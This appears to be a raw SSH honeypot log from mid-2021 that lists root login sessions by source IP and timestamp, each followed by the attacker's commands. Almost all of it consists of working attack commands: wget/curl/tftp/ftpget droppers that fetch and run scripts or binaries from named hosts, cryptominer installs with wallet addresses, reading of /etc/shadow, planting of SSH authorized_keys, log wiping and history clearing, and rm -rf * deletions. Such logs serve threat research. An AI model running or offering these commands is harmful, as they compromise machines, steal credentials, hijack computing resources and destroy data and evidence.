Exec cd /tmp  cd /run  cd /; wget http://194.33.45.197:8080/chernobyl/chernobyl.sh; chmod 777 chernobyl.sh; sh chernobyl.sh chernobyl; tftp 194.33.45.197 -c get chernobyltftp1.sh; chmod 777 chernobyltftp1.sh; sh chernobyltftp1.sh chernobyl; tftp -r chernobyltftp2.sh -g 194.33.45.197; chmod 777 chernobyltftp2.sh; sh chernobyltftp2.sh chernobyl; rm -rf chernobyl.sh chernobyltftp1.sh chernobyltftp2.sh; rm -rf *;history -c
cd /tmp cd /run cd /
wget http://194.33.45.197:8080/chernobyl/chernobyl.sh
chmod 777 chernobyl.sh
sh chernobyl.sh chernobyl
tftp 194.33.45.197 -c get chernobyltftp1.sh
chmod 777 chernobyltftp1.sh
sh chernobyltftp1.sh chernobyl
tftp -r chernobyltftp2.sh -g 194.33.45.197
chmod 777 chernobyltftp2.sh
sh chernobyltftp2.sh chernobyl
rm -rf chernobyl.sh chernobyltftp1.sh chernobyltftp2.sh
rm -rf *
history -c

From 209.141.58.203 23-Jun-2021 03:23:21 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.58.203/ssh1 || curl -o ssh1 209.141.58.203/ssh1; tar xvf ssh1; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh1 || curl -o ssh1 209.141.58.203/ssh1
tar xvf ssh1
cd .ssh
chmod +x *
./sshd
./krane 1

From 154.221.20.50 24-Jun-2021 10:33:21 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget  http://152.136.21.229/ug.txt;perl ug.txt*;wget http://152.136.21.229/serv.tar.gz;tar xf serv.tar.gz;cd serv;mv xmrig server;./server

nproc
uname -a
cd /tmp
rm -rf serv*
wget http://152.136.21.229/ug.txt
perl ug.txt*
wget http://152.136.21.229/serv.tar.gz
tar xf serv.tar.gz
cd serv
mv xmrig server
./server

From 136.144.41.169 25-Jun-2021 23:33:23 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://136.144.41.168/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://136.144.41.168/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
cat db0fa4b8db0333367e9bda3ab68b8042.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 204.48.26.71 26-Jun-2021 03:20:56 ssh2 root
Exec (cd /tmp; wget -qO - narcio.com/ssh|perl; curl -s narcio.com/ssh|perl > /dev/null)
(cd /tmp
wget -qO - narcio.com/ssh|perl
curl -s narcio.com/ssh|perl > /dev/null)

From 61.91.127.36 26-Jun-2021 10:19:42 ssh2 root
Exec echo 'root:1qaz@QWE'>/tmp/up.txt
echo 'root:1qaz@QWE'>/tmp/up.txt

From 209.145.54.176 26-Jun-2021 20:32:12 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz --no-check-certificate
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
w
uname -a
cat /proc/cpuinfo
ifconfig
ps -x

From 141.98.81.154 26-Jun-2021 20:32:59 ssh2 root
apt install wget
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
sudo apt-get install python-pip
sudo apt-get install python3-pip
yum install python-pip
yum install python3-pip
apt-get install python-pip
apt-get install python3-pip
pip install speedtest-cli
apt
wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py
wget NasaPaul.com/info
chmod +x *
./info
ls -a
apt install python-paramiko
apt install python-colorama

From 134.209.249.145 27-Jun-2021 18:13:01 ssh2 root
Exec id;nproc
id
nproc

From 109.104.151.106 28-Jun-2021 13:36:21 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://betaalverzoek.ir/bins/bin.x86; curl -O http://betaalverzoek.ir/bins/bin.x86;chmod +x *;./bin.x86 Roots; bin.x86 Roots
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://betaalverzoek.ir/bins/bin.x86
curl -O http://betaalverzoek.ir/bins/bin.x86
chmod +x *
./bin.x86 Roots
bin.x86 Roots

From 209.141.43.233 29-Jun-2021 12:52:19 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://45.10.24.31/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://45.10.24.31/x86_64
chmod 777 *
./x86_64 x86xhed

From 222.102.232.146 29-Jun-2021 15:23:29 ssh2 root
Exec uname -a;cd /tmp;wget radiodeea.hi2.ro/max.txt;perl max.txt;rm -rf max.txt;history -c;clear
uname -a
cd /tmp
wget radiodeea.hi2.ro/max.txt
perl max.txt
rm -rf max.txt
history -c
clear

From 109.104.151.109 30-Jun-2021 01:25:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://apponline957.ir/vdht.sh; curl -O https://apponline957.ir/vdht.sh; chmod 777 vdht.sh; sh vdht.sh; rm -rf vdht.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://apponline957.ir/vdht.sh
curl -O https://apponline957.ir/vdht.sh
chmod 777 vdht.sh
sh vdht.sh
rm -rf vdht.sh

From 209.141.35.200 1-Jul-2021 07:39:47 ssh2 root
Exec cat /etc/issue;  curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49bGaMpdZtB5MqnyAwMk5u9bv3zjpyTE2RnQz2djYCm1goxkSkPuodnW8ayyjNLfLAA72Qm29uJT4RbxCAzbkVH6PxPAZZa
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49bGaMpdZtB5MqnyAwMk5u9bv3zjpyTE2RnQz2djYCm1goxkSkPuodnW8ayyjNLfLAA72Qm29uJT4RbxCAzbkVH6PxPAZZa

From 45.133.1.92 2-Jul-2021 07:23:44 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://2.56.59.211/bins/sora.x86; cat sora.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://2.56.59.211/bins/sora.x86
cat sora.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 106.12.96.112 2-Jul-2021 23:05:35 ssh2 root
Exec echo -n zdpvadhx|md5sum;uname -a
echo -n zdpvadhx|md5sum
uname -a

From 209.141.47.144 4-Jul-2021 01:06:25 ssh2 root
Exec cat /etc/issue;  curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 205.185.127.240 4-Jul-2021 04:26:11 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ

From 129.226.179.211 4-Jul-2021 05:07:37 ssh2 root
Exec echo -n x1u6jl6q|md5sum;uname -a
echo -n x1u6jl6q|md5sum
uname -a

From 209.141.53.60 4-Jul-2021 06:03:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.53.60 4-Jul-2021 06:12:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.52.40/sensi.sh; curl -O http://209.141.52.40/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 209.141.52.40 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 209.141.52.40; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.52.40/sensi.sh
curl -O http://209.141.52.40/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 209.141.52.40 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 209.141.52.40
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.52.40 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.43.233 4-Jul-2021 12:33:11 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://45.10.24.31/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://45.10.24.31/x86_64
chmod 777 *
./x86_64 x86xhed

From 5.35.253.22 4-Jul-2021 15:18:20 ssh2 root
w
cd /var/opt
wget bagabel.pro/x/drona.jpg
wget http://bagabel.pro/x/drona.jpg
wget -c
curl -O http://bagabel.pro/x/drona.jpg

From 209.141.53.60 4-Jul-2021 15:20:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
ftp
wget -c http://bagabel.pro/x/bnc.jpg
uname -a
cat /etc/issue
ifconfig
apt-get update

From 209.141.53.60 4-Jul-2021 15:23:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
passwd

From 153.156.45.20 4-Jul-2021 16:06:15 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu

From 45.64.130.147 5-Jul-2021 10:20:02 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://highpower.sg/..... -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://highpower.sg/...|perl;wget http://highpower.sg/.... -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://highpower.sg/..... -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://highpower.sg/...|perl
wget http://highpower.sg/.... -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o

From 205.185.119.224 5-Jul-2021 15:44:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 3.6.111.41 5-Jul-2021 22:11:30 ssh2 root
Exec echo -n zxvjixwm|md5sum;uname -a
echo -n zxvjixwm|md5sum
uname -a

From 209.141.32.204 5-Jul-2021 22:20:30 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 209.141.32.204 5-Jul-2021 22:46:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/sensi.sh; curl -O http://205.185.126.121/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 205.185.126.121 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 205.185.126.121; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/sensi.sh
curl -O http://205.185.126.121/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 205.185.126.121 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 205.185.126.121
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 205.185.119.224 6-Jul-2021 01:47:57 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.58.203/ssh || curl -o ssh 209.141.58.203/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane 1

From 209.141.53.60 6-Jul-2021 14:08:42 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://159.65.51.27/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 159.65.51.27 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 159.65.51.27; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://159.65.51.27/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 159.65.51.27 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 159.65.51.27
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 209.141.53.60 6-Jul-2021 15:48:13 ssh2 root
Exec uname -a || echo -
uname -a || echo -
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 209.141.32.204 6-Jul-2021 16:02:07 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 205.185.119.224 6-Jul-2021 17:48:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.98.62.137/8UsA.sh; curl -O http://198.98.62.137/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 198.98.62.137 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 198.98.62.137; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.98.62.137/8UsA.sh
curl -O http://198.98.62.137/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 198.98.62.137 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 198.98.62.137
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 205.185.119.224 6-Jul-2021 18:47:16 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.98.62.137/8UsA.sh; curl -O http://198.98.62.137/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 198.98.62.137 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 198.98.62.137; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.98.62.137/8UsA.sh
curl -O http://198.98.62.137/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 198.98.62.137 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 198.98.62.137
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.98.62.137 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 6-Jul-2021 18:52:20 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://159.65.51.27/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 159.65.51.27 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 159.65.51.27; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://159.65.51.27/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 159.65.51.27 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 159.65.51.27
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 205.185.119.224 7-Jul-2021 01:30:47 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 205.185.119.224 7-Jul-2021 02:20:32 ssh2 root
